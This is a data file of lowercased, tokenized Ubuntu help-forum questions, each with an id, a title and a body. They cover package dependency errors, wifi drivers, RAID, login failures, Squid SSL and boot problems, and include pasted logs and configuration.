216998	broken packages	how can i fix the following broken packages ? : root @ desktop : /home/karl # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-designer : depends : libqt4-script ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is installed depends : libqt4-xml ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is installed breaks : libqt4-designer : i386 ( ! = 4:4.8.1-0ubuntu4.2 ) but 4:4.8.1-0ubuntu4.3 is installed libqt4-designer : i386 : breaks : libqt4-designer ( ! = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-gui : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.2 is installed libqt4-qt3support : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) but 4:4.8.1-0ubuntu4.2 is installed e : unmet dependencies . try using -f. root @ desktop : /home/karl # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqt4-designer the following packages will be upgraded : libqt4-designer 1 upgraded , 0 newly installed , 0 to remove and 22 not upgraded . 5 not fully installed or removed . need to get 0 b/3,610 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libqt4-designer ( -- configure ) : libqt4-designer : amd64 4:4.8.1-0ubuntu4.2 can not be configured because libqt4-designer : i386 is in a different version ( 4:4.8.1-0ubuntu4.3 ) dpkg : error processing libqt4-designer : i386 ( -- configure ) : libqt4-designer : i386 4:4.8.1-0ubuntu4.3 can not be configured because libqt4-designer : amd64 is in a different version ( 4:4.8.1-0ubuntu4.2 ) dpkg : dependency problems prevent configuration of libqt4-qt3support : libqt4-qt3support depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) ; however : version of libqt4-designer on system is 4:4.8.1-0ubuntu4.2 . dpkg : error processing libqt4-qt3support ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) ; however : package libqt4-designer : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-gui : libqt4-gui depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) ; however : version of libqt4-designer on system is 4:4.8.1-0ubuntu4.2 . dpkg : error processing libqt4-gui ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libqt4-designer libqt4-designer : i386 libqt4-qt3support libqt4-qt3support : i386 libqt4-gui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ desktop : /home/karl # apt-get remove libqt4-designer reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-gui : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) but it is not going to be installed libqt4-qt3support : depends : libqt4-designer ( = 4:4.8.1-0ubuntu4.3 ) but it is not going to be installed python-qt4 : depends : libqt4-designer ( > = 4:4.8.0-1~ ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the following is the output of find /etc/apt -name '*.list ' -exec bash -c 'echo -e `` \n $ 1\n '' ; cat -n `` $ 1 '' ' _ ' { } ' \ ; : /etc/apt/sources.list 1 # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/main/binary-i386/ 2 3 # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/restricted/binary-i386/ 4 # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / precise main restricted 5 6 # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to 7 # newer versions of the distribution . 8 deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted 9 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted 10 11 # # major bug fix updates produced after the final release of the 12 # # distribution . 13 deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted 14 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted 15 16 # # n.b . software from this repository is entirely unsupported by the ubuntu 17 # # team . also , please note that software in universe will not receive any 18 # # review or updates from the ubuntu security team . 19 deb http : //us.archive.ubuntu.com/ubuntu/ precise universe 20 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe 21 deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe 22 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe 23 24 # # n.b . software from this repository is entirely unsupported by the ubuntu 25 # # team , and may not be under a free licence . please satisfy yourself as to 26 # # your rights to use the software . also , please note that software in 27 # # multiverse will not receive any review or updates from the ubuntu 28 # # security team . 29 deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse 30 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse 31 deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse 32 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse 33 34 # # n.b . software from this repository may not have been tested as 35 # # extensively as that contained in the main release , although it includes 36 # # newer versions of some applications which may provide useful features . 37 # # also , please note that software in backports will not receive any review 38 # # or updates from the ubuntu security team . 39 deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse 40 deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse 41 42 deb http : //security.ubuntu.com/ubuntu precise-security main restricted 43 deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted 44 deb http : //security.ubuntu.com/ubuntu precise-security universe 45 deb-src http : //security.ubuntu.com/ubuntu precise-security universe 46 deb http : //security.ubuntu.com/ubuntu precise-security multiverse 47 deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse 48 49 # # uncomment the following two lines to add software from canonical's 50 # # 'partner ' repository . 51 # # this software is not part of ubuntu , but is offered by canonical and the 52 # # respective vendors as a service to ubuntu users . 53 # deb http : //archive.canonical.com/ubuntu precise partner 54 # deb-src http : //archive.canonical.com/ubuntu precise partner 55 56 # # this software is not part of ubuntu , but is offered by third-party 57 # # developers who want to ship their latest software . 58 # deb http : //extras.ubuntu.com/ubuntu precise main 59 # deb-src http : //extras.ubuntu.com/ubuntu precise main /etc/apt/sources.list.d/jockey.list 1 deb http : //www.openprinting.org/download/printdriver/debian/ lsb3.2 main /etc/apt/sources.list.d/duncanjdavis-download-monitor-submit-precise.list 1 deb http : //ppa.launchpad.net/duncanjdavis/download-monitor-submit/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/duncanjdavis/download-monitor-submit/ubuntu precise main /etc/apt/sources.list.d/google-chrome.list 1 # # # this file is automatically configured # # # 2 # you may comment out this entry , but any other modifications may be lost . 3 deb http : //dl.google.com/linux/chrome/deb/ stable main /etc/apt/sources.list.d/precise-partner.list 1 deb http : //archive.canonical.com/ubuntu precise partner # added by software-center /etc/apt/sources.list.d/webupd8team-haguichi-precise.list 1 deb http : //ppa.launchpad.net/webupd8team/haguichi/ubuntu precise main 2 deb-src http : //ppa.launchpad.net/webupd8team/haguichi/ubuntu precise main /etc/apt/sources.list.d/google-musicmanager.list 1 # # # this file is automatically configured # # # 2 # you may comment out this entry , but any other modifications may be lost . 3 deb http : //dl.google.com/linux/musicmanager/deb/ stable main
217000	how can i play ea sport cricket ( tm ) 2011 on ubuntu	i am using 12.04 ubuntu , i want to play ea sport cricket ( tm ) 2011 on my loptop . please tell me step by step process . thankyou .
217008	change firefox icons	i am using ubuntu os 12.10 with faenza ambiance icon theme . but with this theme , changed also firefox 's icon theme . is it possible to replace the icons with the default one ? here is a screenshot of how it is now : and i want it like this ( ubuntu mono dark ) : is it possible to change them ?
217009	shared directory ( ubuntu one ) not showing up on my android device	a friend has shared a directory on his ubuntu account with me . his directory shows up on my windows devices ( two of them ) , but does not show up on my android device ( nexus 7 ) using the android app , or on my apple iphone 5 using the apple app . all of these devices show up on my account as connected devices . i 've even tried un-linking and re-linking my android nexus 7 , but the shared directory still does n't show up . how do i fix this ?
217010	vlc mss2 codec missing	i was playing a video in vlc but it displayed the error message vlc does not support the audio or video format `` mss2 '' how to solve this error
217017	dual boot ( ubuntu and windows 7 ) on a raid ssd 's with uefi	i recently bought an sony vaio svs13a1v9eb , which has a raid between two 64 gb ssds and a hybrid-graphics . ( major issue ) i want to have windows 7 ( it is preinstalled ) and ubuntu on this notebook i.e . on the raid drive . in uefi boot mode , the ubuntu installation fails to start with both alternate- and live-cd , throwing an kernel panic error . does anyone have suggestions ? thank you in advance !
217019	ca n't connect to wifi in ubuntu 12.10	since upgrading to 12.10 while it was in beta , i have been unable to connect to wifi , which i was able to do while using 12.04 . my laptop is an acer extensa 5635z .
217023	add two new hdd in raid 1	i just made a fresh install of ubuntu 12.10 on a new ssd ( /dev/sda ) . now i would like to add two 1tb drives ( /dev/sdb /dev/sdc ) in raid 1 but i 'm pretty clueless on how to do it . this is what i came up with ( but did n't work ) : first created partitions on the new drives : sudo fdisk /dev/sdb created primary partition and write table to disk after that : sudo mdadm -- create -- level=1 -- name=raidarray -- raid-devices=2 /dev/sdb /dev/sdc however this outputs : mdadm : device /dev/sdb exists but is not an md array . can somebody point me in the right direction on how to do this ? one bonus question : would it be possible to reserve a part ( same size of ssd ) of one hdd and create a raid 1 with the ssd and part of the hdd . and if so , how and can i keep my installation ?
217029	thinkpad x1 carbon wakes up from sleep automatically	so , i bought a thinkpad x1 carbon and put ubuntu gnome remix 12.10 on it . i 've had an issue . sometimes , the device will resume from its sleep state automatically . this has happened both under windows and ubuntu . all updates applied . i have no idea what causes it , and the resume tends to happen some time ( ~1 hour ) after : a ) i choose `` suspend '' from the gnome menu . b ) i unplug the machine from power . this has occurred twice under windows with automatic updates disabled . this has occurred at least 4 times on ubuntu and i can not recognize any pattern other than each time , i had a lot running . for example , stats show ram : 3.0gb ( 84.6 % ) of 3.6gb swap : 3.8gb ( 47.5 % ) of 7.9gb my theory is that after some time , it tries to hibernate ( though it is disabled and i am unable to enable it in the menus ) . 'pm-hibernate ' allows me to lose my work when i turn on my computre . i have tried upgrading to kernel 3.6.6 to see if any changes occurred , no change . one peculiar note , the laptop itself blinks the 'moon light ' while in sleep and documentation states that it will keep blinking as long as it is in sleep . this happens in windows . in linux , this stops after an hour or so , however , the system usually restores without issue from the sleep state . i apologize for the long read . how can i troubleshoot and which logs are useful ? i have made a copy of all in /var/log/ . thanks you very much
217031	ca n't connect to wifi using an atheros ar9271 802.11n usb-adapter	i 'm just installed an ubuntu 12.04 on my pc as a second os in addition to my win7 . and got a problem with wireless connection . my network works in 802.11g mode and my usb-adapter is compatible with b/g/n types and it works perfect in win7 , but causes some troubles for me in ubuntu - all available networks are shown , but when i 'm trying to connect - it tries for a 30 seconds ( not sure how long ) , but then shows me an error `` disconnected - you are now offline '' . could anyone help me , please ?
217032	unable to sign in . how to debug ?	i had to reboot system with reset button . after reboot i ca n't sign in . when i enter my password it seems like x-server just restarts . i can sign-in as guest and also i can sign-in in text tty . here is first 150 lines of my lightdm.log : [ +0.04s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.04s ] debug : starting light display manager 1.2.1 , uid=0 pid=1070 [ +0.04s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.04s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.04s ] debug : registered seat module xlocal [ +0.04s ] debug : registered seat module xremote [ +0.04s ] debug : adding default seat [ +0.04s ] debug : starting seat [ +0.04s ] debug : starting new display for automatic login as user dmytro [ +0.04s ] debug : starting local x display [ +3.64s ] debug : x server :0 will replace plymouth [ +3.66s ] debug : using vt 7 [ +3.66s ] debug : activating vt 7 [ +3.66s ] debug : logging to /var/log/lightdm/x-0.log [ +3.66s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +3.66s ] debug : launching x server [ +3.66s ] debug : launching process 1154 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none [ +3.66s ] debug : waiting for ready signal from x server :0 [ +3.66s ] debug : acquired bus name org.freedesktop.displaymanager [ +3.66s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +10.78s ] debug : got signal 10 from process 1154 [ +10.78s ] debug : got signal from x server :0 [ +10.78s ] debug : stopping plymouth , x server is ready [ +10.80s ] debug : connecting to xserver :0 [ +10.80s ] debug : automatically logging in user dmytro [ +10.80s ] debug : started session 1303 with service 'lightdm-autologin ' , username 'dmytro' [ +13.22s ] debug : session 1303 authentication complete with return value 0 : success [ +13.26s ] debug : autologin user dmytro authorized [ +13.27s ] debug : autologin using session ubuntu [ +14.44s ] debug : dropping privileges to uid 1000 [ +14.48s ] debug : restoring privileges [ +14.49s ] debug : dropping privileges to uid 1000 [ +14.49s ] debug : writing /home/dmytro/.dmrc [ +14.61s ] debug : restoring privileges [ +14.81s ] debug : starting session ubuntu as user dmytro [ +14.81s ] debug : session 1303 running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu [ +15.76s ] debug : new display ready , switching to it [ +15.76s ] debug : activating vt 7 [ +15.76s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 [ +16.63s ] debug : session 1303 exited with return value 0 [ +16.63s ] debug : user session quit [ +16.63s ] debug : stopping display [ +16.63s ] debug : sending signal 15 to process 1154 [ +17.19s ] debug : process 1154 exited with return value 0 [ +17.19s ] debug : x server stopped [ +17.19s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +17.19s ] debug : releasing vt 7 [ +17.19s ] debug : display server stopped [ +17.19s ] debug : display stopped [ +17.19s ] debug : active display stopped , switching to greeter [ +17.19s ] debug : switching to greeter [ +17.19s ] debug : starting new display for greeter [ +17.19s ] debug : starting local x display [ +17.19s ] debug : using vt 7 [ +17.19s ] debug : logging to /var/log/lightdm/x-0.log [ +17.19s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +17.19s ] debug : launching x server [ +17.19s ] debug : launching process 1563 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +17.19s ] debug : waiting for ready signal from x server :0 [ +17.48s ] debug : got signal 10 from process 1563 [ +17.48s ] debug : got signal from x server :0 [ +17.48s ] debug : connecting to xserver :0 [ +17.48s ] debug : starting greeter [ +17.48s ] debug : started session 1575 with service 'lightdm ' , username 'lightdm' [ +17.61s ] debug : session 1575 authentication complete with return value 0 : success [ +17.61s ] debug : greeter authorized [ +17.61s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +17.68s ] debug : session 1575 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +20.86s ] debug : greeter connected version=1.2.1 [ +20.86s ] debug : greeter connected , display is ready [ +20.86s ] debug : new display ready , switching to it [ +20.86s ] debug : activating vt 7 [ +20.86s ] debug : stopping greeter display being switched from [ +24.90s ] debug : greeter start authentication for dmytro [ +24.90s ] debug : started session 1746 with service 'lightdm ' , username 'dmytro' [ +25.10s ] debug : session 1746 got 1 message ( s ) from pam [ +25.10s ] debug : prompt greeter with 1 message ( s ) [ +31.87s ] debug : continue authentication [ +33.75s ] debug : session 1746 authentication complete with return value 7 : authentication failure [ +33.75s ] debug : authenticate result for user dmytro : authentication failure [ +33.75s ] debug : greeter start authentication for dmytro [ +33.75s ] debug : session 1746 : sending sigterm [ +33.75s ] debug : started session 2264 with service 'lightdm ' , username 'dmytro' [ +33.75s ] debug : session 2264 got 1 message ( s ) from pam [ +33.75s ] debug : prompt greeter with 1 message ( s ) [ +36.41s ] debug : continue authentication [ +36.53s ] debug : session 2264 authentication complete with return value 0 : success [ +36.53s ] debug : authenticate result for user dmytro : success [ +36.54s ] debug : user dmytro authorized [ +36.54s ] debug : greeter requests session ubuntu [ +36.54s ] debug : using session ubuntu [ +36.54s ] debug : stopping greeter [ +36.54s ] debug : session 1575 : sending sigterm [ +37.41s ] debug : greeter closed communication channel [ +37.41s ] debug : session 1575 exited with return value 0 [ +37.41s ] debug : greeter quit [ +37.42s ] debug : dropping privileges to uid 1000 [ +37.42s ] debug : restoring privileges [ +37.43s ] debug : dropping privileges to uid 1000 [ +37.43s ] debug : writing /home/dmytro/.dmrc [ +38.35s ] debug : restoring privileges [ +40.37s ] debug : starting session ubuntu as user dmytro [ +40.37s ] debug : session 2264 running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu [ +40.39s ] debug : registering session with bus path /org/freedesktop/displaymanager/session1 [ +50.78s ] debug : session 2264 exited with return value 0 [ +50.78s ] debug : user session quit [ +50.78s ] debug : stopping display [ +50.78s ] debug : sending signal 15 to process 1563 [ +51.53s ] debug : process 1563 exited with return value 0 [ +51.53s ] debug : x server stopped [ +51.53s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +51.53s ] debug : releasing vt 7 [ +51.53s ] debug : display server stopped [ +51.53s ] debug : display stopped [ +51.53s ] debug : active display stopped , switching to greeter [ +51.53s ] debug : switching to greeter [ +51.53s ] debug : starting new display for greeter [ +51.53s ] debug : starting local x display [ +51.53s ] debug : using vt 7 [ +51.53s ] debug : logging to /var/log/lightdm/x-0.log [ +51.53s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +51.53s ] debug : launching x server [ +51.53s ] debug : launching process 2894 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch [ +51.53s ] debug : waiting for ready signal from x server :0 [ +51.75s ] debug : got signal 10 from process 2894 [ +51.75s ] debug : got signal from x server :0 [ +51.75s ] debug : connecting to xserver :0 [ +51.75s ] debug : starting greeter [ +51.75s ] debug : started session 2898 with service 'lightdm ' , username 'lightdm' [ +51.76s ] debug : session 2898 authentication complete with return value 0 : success [ +51.76s ] debug : greeter authorized [ +51.76s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +51.76s ] debug : session 2898 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +53.26s ] debug : greeter connected version=1.2.1 [ +53.26s ] debug : greeter connected , display is ready [ +53.26s ] debug : new display ready , switching to it [ +53.26s ] debug : activating vt 7 [ +53.26s ] debug : stopping greeter display being switched from [ +54.17s ] debug : greeter start authentication for dmytro [ +54.17s ] debug : started session 3152 with service 'lightdm ' , username 'dmytro' [ +54.18s ] debug : session 3152 got 1 message ( s ) from pam [ +54.18s ] debug : prompt greeter with 1 message ( s ) [ +58.61s ] debug : continue authentication [ +58.65s ] debug : session 3152 authentication complete with return value 0 : success [ +58.65s ] debug : authenticate result for user dmytro : success [ +58.66s ] debug : user dmytro authorized [ +58.66s ] debug : greeter requests session ubuntu [ +58.66s ] debug : using session ubuntu [ +58.66s ] debug : stopping greeter [ +58.66s ] debug : session 2898 : sending sigterm how can i fix it ? what other .log files could possibly give me a clue ? update : possibly it 's duplicate of desktop login fails , terminal works
217038	ubuntu 12.10 broadcom wireless complete system freeze	i recently re-installed ubuntu 12.10 and updated/upgraded everything same as i 've always done . however , i now no longer have a wireless option in the network manager , despite the proprietary driver being installed via the 'software sources ' interface . i 'm not new to linux , and i 've had trouble with my wireless card/drivers from square one , so i knew how to fix the problem : go to the software sources and disable the broadcom proprietary driver ( bcmwl-kernel-source ) - success open a terminal and load the brcmsmac module `` # modprobe brcmsmac '' - success in terminal , use `` iwconfig '' to ensure that the wireless interfaces are properly detected - success ( wlan0 detected , interface set to down ) set the interface up via `` # ip link set wlan0 up '' - failure at this point , the system freezes completely , and the only input that has effect is holding down the hardware power button to reboot . the same result is met by using the network manager applet in the unity notification area to `` enable wireless . '' this week alone i 've had centos , opensuse and fedora running fully updated on my system without any wireless issues . any help is appreciated . additional info : $ lspci | grep broadcom 01:00.0 network controller : broadcom corporation bcm43225 802.11b/g/n ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation netxtreme bcm57760 gigabit ethernet pcie ( rev 01 ) $ lsmod module size used by rfcomm 46619 0 bnep 18140 2 parport_pc 32688 0 ppdev 17073 0 ext2 72880 1 snd_hda_codec_conexant 57842 1 btusb 18334 0 bluetooth 209199 11 rfcomm , bnep , btusb arc4 12529 2 brcmsmac 531848 0 mac80211 539908 1 brcmsmac brcmutil 14755 1 brcmsmac cfg80211 206566 2 brcmsmac , mac80211 cordic 12535 1 brcmsmac coretemp 13400 0 kvm_intel 132759 0 kvm 414070 1 kvm_intel acer_wmi 32453 0 sparse_keymap 13890 1 acer_wmi microcode 22803 0 snd_hda_intel 33491 2 snd_hda_codec 134212 2 snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 96580 2 snd_hda_intel , snd_hda_codec bcma 35656 1 brcmsmac snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event psmouse 95552 0 serio_raw 13215 0 lpc_ich 17061 0 uvcvideo 76749 0 videobuf2_core 32851 1 uvcvideo joydev 17457 0 videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc intel_ips 18049 0 snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq i915 520629 8 snd 78734 13 snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device drm_kms_helper 46784 1 i915 drm 275528 4 i915 , drm_kms_helper i2c_algo_bit 13413 1 i915 soundcore 15047 1 snd wmi 19070 1 acer_wmi snd_page_alloc 18484 2 snd_hda_intel , snd_pcm mei 40690 0 video 19335 2 acer_wmi , i915 mac_hid 13205 0 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp ums_realtek 17949 0 usb_storage 48838 1 ums_realtek uas 17844 0 hid_generic 12493 0 usbhid 46947 0 hid 100366 2 hid_generic , usbhid tg3 148780 0
217040	squid with enable-ssl option does n't work	i recompile squid package with enable-ssl options but it does n't help me . i have got this error ignoring https_port [ : : ] :443 due to ssl initialization failure . in same time squid works well for http traffic . please , help me . thanks . -- $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise $ squid3 -v squid cache : version 3.1.19 configure options : ' -- build=x86_64-linux-gnu ' ' -- prefix=/usr ' ' -- includedir= $ { prefix } /include ' ' -- mandir= $ { prefix } /share/man ' ' -- infodir= $ { prefix } /share/info ' ' -- sysconfdir=/etc ' ' -- localstatedir=/var ' ' -- libexecdir= $ { prefix } /lib/squid3 ' ' -- srcdir= . ' ' -- disable-maintainer-mode ' ' -- disable-dependency-tracking ' ' -- disable-silent-rules ' ' -- datadir=/usr/share/squid3 ' ' -- sysconfdir=/etc/squid3 ' ' -- mandir=/usr/share/man ' ' -- with-cppunit-basedir=/usr ' ' -- enable-inline ' ' -- enable-async-io=8 ' ' -- enable-storeio=ufs , aufs , diskd ' ' -- enable-removal-policies=lru , heap ' ' -- enable-delay-pools ' ' -- enable-cache-digests ' ' -- enable-underscores ' ' -- enable-icap-client ' ' -- enable-follow-x-forwarded-for ' ' -- enable-auth=basic , digest , ntlm , negotiate ' ' -- enable-basic-auth-helpers=ldap , msnt , ncsa , pam , sasl , smb , yp , db , pop3 , getpwnam , squid_radius_auth , multi-domain-ntlm ' ' -- enable-ntlm-auth-helpers=smb_lm , ' ' -- enable-digest-auth-helpers=ldap , password ' ' -- enable-negotiate-auth-helpers=squid_kerb_auth ' ' -- enable-external-acl-helpers=ip_user , ldap_group , session , unix_group , wbinfo_group ' ' -- enable-arp-acl ' ' -- enable-esi ' ' -- enable-zph-qos ' ' -- enable-wccpv2 ' ' -- disable-translation ' ' -- with-logdir=/var/log/squid3 ' ' -- with-pidfile=/var/run/squid3.pid ' ' -- with-filedescriptors=65536 ' ' -- with-large-files ' ' -- with-default-user=proxy ' ' -- enable-ssl ' ' -- with-open-ssl=/usr/lib/ssl/openssl.cnf ' ' -- enable-linux-netfilter ' 'build_alias=x86_64-linux-gnu ' 'cflags=-g -o2 -fpie -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security ' 'ldflags=-wl , -bsymbolic-functions -fpie -pie -wl , -z , relro -wl , -z , now ' 'cppflags=-d_fortify_source=2 ' 'cxxflags=-g -o2 -fpie -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security -werror=format-security ' -- with-squid=/usr/src/squid3-3.1.19
217043	how do i pause and resume apt-fast package download ?	i know that in order to speed up apt-get downloads , i can use apt-fast ( which uses the aria2c or axel engine - it depends on which one i install during the configuration ) . but even though it says it can pause and resume downloads , i do n't know how to do it , and i ca n't find any answer online that tells me how to do it . i have no intention of pausing apt-fast update function , i just want the ability to pause the sudo apt-fast install package_name function and resume the downloading of a package in ubuntu at will using apt-fast ( with axel or aria2c ) i have seen in some forums that sudo apt-fast update can not be paused because it requires starting the entire process . please correct me if i 'm wrong . any help would be much appreciated .
217044	i do n't start win7 from grub2	when i start win7 from list . i see `` file not found grub rescue > '' . i do n't know what is problem . i 'm begginer with ubuntu 12.04. log from boot repair http : //paste.ubuntu.com/1357573
217049	how do i install nvidia drivers in 12.10 ( new to ubuntu )	hey guys i just installed ( dual booted ) ubuntu 12.10 64 bit on my machine . ( now running 32 bit ubuntu 12.10 ) specs : asus m5a97 mobo 16 gb of amd entertainment ram gigabyte geforce 550 gtx ti amd bulldozer 8120 eight-core cpu any ways i was just wondering how i could install the latest nvidia drivers for my card thanks
217053	gnome-classic , new windows remain buried behind other window	i have recently moved from arch linux to ubuntu 11.10 . i switched to using gnome-classic and noticed strange behaviours with the windows whenever i open them . i have setup launchers on the panel to launch dolphin , terminal and chrome browser . whenever i launch any of these i notice that they open behind the current window that is in-focus instead of coming up in front . according to me any sane windows manager would by default bring up the new window in front and focus , why would you want to open a window hidden behind all other window ? is there any thing or configuration that i need to check ?
217059	packard bell tk11 wifi not working ( ubuntu 12.10 )	hardware : packard bell easynote tk11bz , bios version 1.15 broadcom bcm43227 802.11 b/n/g problem : everything works as it should , except the wireless connection . the wifi device is enabled in the `` additional drivers '' section of software sources , but does not even show up in the network manager drop-down . sudo lshw -c network : *-network unclaimed description : network controller product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0100000-f0103fff
217061	dell vostro 3560 wifi installation kernel problem	i used this command for this au q & a sudo dpkg -i 1.deb and i get this message : module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . i do have this installed but still do n't have a working wifi is it a problem in my kernel maybe ? fresh ubuntu 12.10 x64 , and i have tried x32
217068	developing opengles2 apps for ubuntu software center	i have a game for ios and android that i now want to port to ubuntu . i plan to distribute it with ubuntu software center . preferrably for free with an in-app-purchase . my codebase is currently based on opengl es2 and written in c++ . i could rewrite to opengl , but having progammable shaders is a must . fixed pipeline opengl will not suffice . is there a feature in place that lets you specify opengl requirements in the ubuntu software center ? i want to make sure that only ubuntu users with compatible hardware will be able to download my game . any apis i could use for getting a suitable opengl context , or am i expected to just use glx for this ? or is the use of gtk mandatory ?
217069	ftp server user adding	im setting up a ftp server using vsftp and i need to ask it : how in the world you set your login details ? ive found on the internet a lot of guides , but all say to add users in a specific file , but where do you set your password and most are about setting up the server so it can run ( including the ubuntu ftp server guide ) .can anyone help me ?
217073	kvm disabled by bios after installing nvidia driver	whenever i try to switch from the nouveau driver to any nvidia driver ( 304 , 310 or nvidia-current ) and reboot my machine after selecting a driver ubuntu boots with the following error : [ 2.4556 ] kvm : disabled by bios [ 2.4556 ] kvm : disabled by bios [ 2.4556 ] kvm : disabled by bios the numbers in front of the text are always something in the form of 2.xxx . is there anyone else experiencing problems ? my graphics card is the nvidia gtx550 ti
217075	ubuntu installation i ca n't make more than one partion	i installed ubuntu several times but in none of options free space is available from which i can make partitions.it has automatically installed ubuntu in 158 gb and has taken 1 gb for swap.i have 1 gb ram and 160 gb hard disk and installed ubuntu from pen drive
217079	how to open terminal on xubuntu ?	i have xubuntu running my mouse does not working . i was trying to open terminal using ctrl+alt+t . it was not worked and googled i found that opening terminal shortcut will not work . now i want to open terminal through application but i do n't know kb shortcut for opening applications . can anyone guide me ?
217081	fresh install 12.04 from 11.04 ca n't log in	hi just did fresh install of 12.04. rsynced my /home to new partition prior to install . all went fine but i can not log in with my user account . am able to log in as guest . any ideas ?
217087	thunderbird zenity dialog	whenever i get a new email in thunderbird , zinity pops up with a modal dialog box : this is very anoying and when i 'm away for some time and get back , i have to click ok/cancel a dozen time to get rid of it . how can i disable this ? i also get the notification with subject/from etc but that 's fine .
